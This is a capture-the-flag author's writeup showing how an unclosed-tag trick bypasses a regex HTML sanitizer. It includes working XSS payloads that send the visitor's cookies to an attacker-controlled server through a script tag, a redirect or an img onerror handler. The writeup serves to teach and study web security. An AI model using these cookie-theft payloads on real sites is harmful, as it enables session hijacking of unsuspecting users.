GreyCTF 2023 Finals: MyHTMLSan
This is the author’s writeup for the challenge MyHTMLSan in the web category.
It describes the solution I intended when I made the challenge.
Challenge description #
LiveOverflow inspired me to host html files, I hope I made them safe enough.
- Junhua
There was no source code for this challenge, only a link to the website.
My Notes #
- This was meant to be an easy challenge.
- The inspiration for the challenge came from LiveOverflow’s video on the HTML specification.
- The source code can be found here.
- I could have locked it down further with a blacklist, or by setting the headless browser not to follow redirects.
Notes to future self when setting up this challenge #
- Spend more time checking for unexpected solutions.
The Website #


Each submission is stored at a location derived from a UUID, which prevents users from guessing the locations of other submissions.
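A minimal sketch of how UUID-based submission locations could work, assuming a Node.js backend. The in-memory store, `saveSubmission`, `getSubmission` and the `/submission/` route are hypothetical names for illustration, not the challenge's actual code. A version 4 UUID carries 122 random bits, which makes enumerating other people's submissions impractical.

```javascript
const { randomUUID } = require("crypto");

// Hypothetical in-memory store: each submission is saved under a random
// version 4 UUID, so its URL cannot be derived from other submissions.
const submissions = new Map();

function saveSubmission(html) {
  const id = randomUUID(); // 122 random bits
  submissions.set(id, html);
  return `/submission/${id}`; // hypothetical route
}

function getSubmission(id) {
  return submissions.get(id); // undefined for unknown IDs
}

const submissionPath = saveSubmission("<h1>test</h1>");
console.log(submissionPath);
```

Usage: the returned path is the only handle to the stored HTML; guessing another valid path means guessing a fresh random UUID.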
Looking at the question #
As the image above shows, normal text is not sanitized by the page. Let us try some HTML tags.
After submitting <h1>test</h1>, we see the following output.

<h1>test</h1>
We can see from the above that the h1 tags were stripped.
To complete this challenge, we have to find an XSS vulnerability in the website and get the admin to visit our submission so that we can exploit it.
Finding the XSS vulnerability #
Another hint we have yet to look into is the LiveOverflow video embedded in the website. In the video, he talks about how he “discovered” an HTML sanitizer bypass that let him inject JavaScript into a website, but eventually found out that it was just a quirk of the HTML specification.
He also specifically mentions that an opening < followed by a digit (i.e. [0-9]) does not start an HTML tag; the parser treats the < as plain text and rewrites it.
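To make this concrete, here is a simplified sketch (not a real parser) of the first decision the HTML tokenizer makes after seeing a <, modelled on the "tag open state" of the WHATWG HTML specification. The function name `classifyTagOpen` is hypothetical. Only an ASCII letter starts a start tag, so a digit leaves the < as text.

```javascript
// Simplified sketch of the HTML tokenizer's "tag open state".
// Given the character right after "<", decide what the tokenizer does next.
function classifyTagOpen(nextChar) {
  if (nextChar === undefined) return "text"; // end of input: "<" is emitted as text
  if (nextChar === "!") return "markup-declaration"; // comment, DOCTYPE, CDATA
  if (nextChar === "/") return "end-tag";
  if (nextChar === "?") return "bogus-comment";
  if (/^[A-Za-z]$/.test(nextChar)) return "start-tag"; // only ASCII letters start a tag
  return "text"; // anything else, digits included: "<" is emitted as text
}

for (const input of ["<h1>", '<22 foo="bar">', "</p>", "<!-- x -->"]) {
  console.log(input, "->", classifyTagOpen(input[1]));
}
```

This is why <22 ...> never becomes an element: the tokenizer gives up on the tag at the very first character.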
Let us try the example he gave in the video, <22 foo="bar<h1>">test</22>.

As the image shows, this too was stripped from the output.
Hmm… maybe something else in the video hints at the answer to this challenge.
Towards the end of the video, he talks about how HTML cannot be parsed using regex. He then shows an example of a regex he found online that supposedly parses HTML.
Perhaps the sanitizer is built on a regex.
Regex from the video #
The post he mentions in the video can be found here.
The main regex that was shown is <(?:"[^"]*"['"]*|'[^']*'['"]*|[^'">])+>. This regex is used to match HTML tags.
However, this regex has some issues.
It does not match a tag that is missing its closing > (e.g. <br instead of <br />).
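This behaviour can be checked with the regex itself. The sketch below assumes a hypothetical sanitizer that simply deletes every match of the regex; this is a guess at how such a sanitizer might work, not the challenge's source code.

```javascript
// Regex from the StackOverflow post shown in the video ("g" flag added so
// that every match is replaced).
const TAG_REGEX = /<(?:"[^"]*"['"]*|'[^']*'['"]*|[^'">])+>/g;

// Hypothetical sanitizer: delete everything the regex recognises as a tag.
function naiveSanitize(html) {
  return html.replace(TAG_REGEX, "");
}

console.log(naiveSanitize("<h1>test</h1>"));               // tags removed
console.log(naiveSanitize('<22 foo="bar<h1>">test</22>')); // tags removed
console.log(naiveSanitize("<h1"));                          // no closing ">", left untouched
console.log(naiveSanitize('<script src="https://example.com/a.js"')); // also untouched
```

Every match has to end in >, so an unterminated tag slips through, and the browser then finishes the tag using whatever markup follows it on the page.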
Let us try it out on the website.

For the result above, we submitted the payload <h1 without the closing >.
As you can see from the rendered HTML, the h1 tag was not sanitized.
The solution #
With that, we can use different tags to inject our JavaScript payload. There are multiple solutions.
Script Payload #
<script src="https://github.com/Jh123x/payload/raw/main/alert.js"

With the payload above, the script tag was rendered correctly on the page.

However, Chrome blocked the script from loading.
This is due to Cross-Origin Read Blocking (CORB), a Chrome feature that blocks certain cross-origin responses; for more information, see the CORB link under Useful Links.
TLDR: Chrome blocks the loading of scripts from other domains that are not served with a JavaScript content type such as text/javascript.
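A rough model of the rule in the TLDR: compare the essence (the type/subtype part) of the response's Content-Type header against a few JavaScript MIME types. This is a simplification; the set below is not the full list from the WHATWG MIME Sniffing specification, and real browser behaviour (CORB, `X-Content-Type-Options: nosniff`, strict MIME type checking) has more cases. `scriptWouldLoad` and `mimeEssence` are hypothetical helpers.

```javascript
// A few common JavaScript MIME types; NOT the complete list from the spec.
const JS_MIME_TYPES = new Set([
  "text/javascript",
  "application/javascript",
  "application/x-javascript",
  "text/ecmascript",
  "application/ecmascript",
]);

// The "essence" of a Content-Type value is its type/subtype, without
// parameters such as "; charset=utf-8", compared case-insensitively.
function mimeEssence(contentType) {
  return contentType.split(";")[0].trim().toLowerCase();
}

// Simplified model of the TLDR: a cross-origin script is only loaded when
// it is served with a JavaScript content type.
function scriptWouldLoad(contentType) {
  return JS_MIME_TYPES.has(mimeEssence(contentType));
}

console.log(scriptWouldLoad("text/plain; charset=utf-8"));
console.log(scriptWouldLoad("text/javascript; charset=UTF-8"));
```

Under this model, the fix is to serve the payload from a host where we control the Content-Type header.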
Thus, to make it work, we have to host the script on a service that lets us control the response, such as webhook.site.

There, we can edit the response that is returned when someone visits our URL.
<script src="https://webhook.site/7ee53c33-a346-45da-8183-99142b31efcd"
With the above payload, we can now load any JavaScript we want.

Now that we can trigger an alert, we can change the script to redirect the visitor, along with their cookies, to our server, and then report the page to the admin to get the flag.
document.location.href = "<your site here>?cookie=" + document.cookie;
When the admin visits the page, they are redirected to our server with their cookie in the query string, from which we can retrieve the flag.
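The payload above concatenates document.cookie into the URL as-is. A slightly more robust variant, sketched below, URL-encodes the cookie so that characters such as & or # cannot split or truncate the query string, and shows how the receiving side could read it back. `buildExfilUrl`, `extractCookie` and `https://attacker.example/` are hypothetical placeholders; in the writeup, webhook.site plays the receiver's role.

```javascript
// Attacker side (runs in the victim's browser in practice): build the
// redirect URL, encoding the cookie so "&" or "#" cannot break the query.
function buildExfilUrl(base, cookie) {
  return base + "?cookie=" + encodeURIComponent(cookie);
}

// Receiver side: read the cookie back out of an incoming request URL.
// The base URL is only needed to resolve relative paths like "/?cookie=...".
function extractCookie(requestUrl) {
  const url = new URL(requestUrl, "http://localhost");
  return url.searchParams.get("cookie");
}

const sent = buildExfilUrl("https://attacker.example/", "flag=grey{a&b#c}");
console.log(sent);
console.log(extractCookie(sent));
```

In the browser, the payload would then become document.location.href = buildExfilUrl("<your site here>", document.cookie), with the helper inlined.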
Img Payload #
There is also an alternative using the img tag:
<img src="aa" onerror="document.location.href='<site here>?cookies='+document.cookie"
This will have the same effect as the script tag above (and is faster).
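Since the regex matches anything between a < and a >, the exfiltration URL substituted for <site here> must not itself contain < or >, or the sanitizer could strip part of the payload. The hypothetical helper below builds the img payload for a given URL and rejects characters that would break it; it reuses the regex from the video and assumes a hypothetical sanitizer that deletes every regex match.

```javascript
// Regex from the StackOverflow post shown in the video.
const TAG_REGEX = /<(?:"[^"]*"['"]*|'[^']*'['"]*|[^'">])+>/g;

// Hypothetical helper: build the img payload for a given exfiltration URL.
// The trailing ">" is deliberately omitted so the regex cannot match.
function buildImgPayload(exfilBase) {
  if (/[<>"']/.test(exfilBase)) {
    // "<" or ">" would give the regex something to match and strip;
    // quotes would break out of the attribute or the JS string.
    throw new Error("exfil URL must not contain < > \" or '");
  }
  return `<img src="aa" onerror="document.location.href='${exfilBase}?cookies='+document.cookie"`;
}

const payload = buildImgPayload("https://attacker.example/");
console.log(payload);
console.log(payload.replace(TAG_REGEX, "") === payload); // nothing stripped
```

Leaving the literal <site here> placeholder in the payload would be a mistake: the regex matches it as a tag and deletes it.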
Flag #
Flag: grey{r3geX_1s_N0t_4_htm1_cee664daa169f7cdb53f87ab810ccb15}
Useful Links #
- LiveOverflow’s video on the HTML specification, to learn about parsing HTML with regex
- Webhook.site, to have an attacker-controlled server to receive cookies
- CORB, to learn why Chrome blocks the script from loading
- MyHtmlSan Source Code
- StackOverflow post on why you should not use regex on HTML